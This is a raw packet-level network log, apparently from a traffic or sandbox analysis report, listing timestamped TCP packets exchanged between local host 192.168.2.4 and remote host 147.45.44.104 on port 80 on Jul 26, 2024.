Jul 26, 2024 18:56:42.616718054 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.616730928 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.616741896 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.616770983 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.616782904 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.625802994 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.625814915 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.625823975 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.625835896 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.625844002 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.625849009 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.625866890 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.625895023 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.668756962 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.668857098 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.668992996 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.669004917 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.669050932 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.669413090 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.669425011 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.669436932 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.669466972 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.669486046 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.670528889 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.670536041 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.670547009 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.670576096 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.670600891 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.671842098 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.671859026 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.671865940 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.671869040 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.671890020 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.671904087 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.672784090 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.672796965 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.672808886 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.672849894 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.672849894 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.673150063 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.673161983 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.673172951 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.673201084 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.673226118 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.674773932 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.674781084 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.674787045 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.674798012 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.674846888 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.675266027 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.675277948 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.675287962 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.675314903 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.675335884 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.675982952 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.675995111 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.676006079 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.676028013 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.676057100 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.677064896 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.677068949 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.677074909 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.677086115 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.677109957 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.677124977 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.677678108 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.677721977 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.690433979 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.690567970 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.690574884 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.690586090 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.690716982 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.690716982 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.691203117 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.691215038 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.691222906 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.691245079 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.691263914 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.692059994 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.692073107 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.692085981 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.692101002 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.692131042 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.695564985 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.695579052 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.695588112 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.695600986 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.695647001 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.695667028 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.695947886 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.695960045 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.695970058 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.695981026 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.695987940 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.696026087 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.699953079 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.699987888 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.700011969 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.700021029 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.700042009 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.700057030 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.700058937 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.700095892 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.700496912 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.700512886 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.700529099 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.700532913 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.700546026 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.700547934 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.700562954 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.700562954 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.700582027 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.700596094 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.701430082 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.701442003 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.701453924 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.701466084 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.701478004 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.701495886 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.701525927 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.702403069 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.702415943 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.702426910 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.702439070 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.702449083 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.702460051 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.702481985 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.703362942 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.703373909 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.703381062 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.703387022 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.703411102 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.703439951 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.704304934 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.704354048 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.710700989 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.710711956 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.710724115 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.710757017 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.710783005 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.711275101 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.711287022 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.711297035 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.711316109 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.711339951 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.715154886 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.715167046 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.715178967 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.715209007 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.715234995 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.715615034 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.715626955 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.715636969 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.715647936 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.715653896 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.715677977 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.716543913 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.716556072 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.716564894 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.716604948 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.716619968 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.717430115 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.717442036 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.717453003 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.717468977 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.717497110 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.718188047 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.718200922 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.718210936 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.718223095 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.718234062 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.718238115 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.718266964 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.719183922 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.719197035 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.719208002 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.719219923 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.719223976 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.719254971 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.720170021 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.720181942 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.720192909 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.720205069 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.720208883 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.720216036 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.720240116 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.720277071 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.721131086 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.721178055 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.755109072 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.755206108 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.755269051 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.755280972 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.755311966 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.755332947 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.755805969 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.755816936 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.755827904 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.755853891 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.755889893 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.773252964 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.773287058 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.773298025 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.773401976 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.773746967 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.773757935 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.773766994 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.773777962 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.773828983 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.774540901 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.774553061 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.774560928 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.774616957 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.775254965 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.775265932 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.775274992 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.775285006 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.775331974 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.776252985 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.776264906 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.776273966 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.776283979 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.776293039 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.776328087 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.776416063 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.777122974 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.777134895 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.777193069 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.780991077 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.781058073 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.781109095 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.781121016 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.781163931 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.781640053 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.781652927 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.781663895 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.781676054 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.781721115 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.807662964 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.807770967 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.807782888 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.807782888 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.807815075 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.807826042 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.808325052 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.808336973 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.808348894 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.808382034 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.808417082 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.809334040 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.809346914 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.809362888 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.809390068 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.809593916 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.810271025 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.810282946 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.810292959 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.810303926 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.810336113 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.810368061 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.811815023 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.811829090 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.811837912 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.811877966 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.811877966 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.813004017 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.813014984 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.813024998 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.813075066 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.813075066 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.813417912 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.813429117 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.813438892 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.813448906 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.813460112 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.813477993 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.813477993 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.813504934 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.814344883 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.814357042 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.814362049 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.814372063 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.814407110 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.814434052 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.815289021 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.815299988 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.815310001 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.815320015 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.815326929 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.815344095 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.815372944 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.815372944 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.817621946 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.817634106 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.817642927 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.817652941 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.817681074 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.818990946 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.819001913 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.819011927 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.819020987 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.819047928 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.819047928 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.819076061 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.819372892 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.819384098 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.819391966 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.819401979 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.819411039 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.819423914 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.819448948 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.820229053 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.820241928 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.820254087 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.820265055 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.820295095 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.820295095 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.821151972 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.821166039 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.821176052 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.821187973 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.821199894 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.821202040 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.821212053 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.821249008 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.821249962 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.821858883 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.821872950 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.821885109 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.821894884 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.821916103 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.821944952 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.821971893 CEST	49757	80	192.168.2.4	147.45.44.104
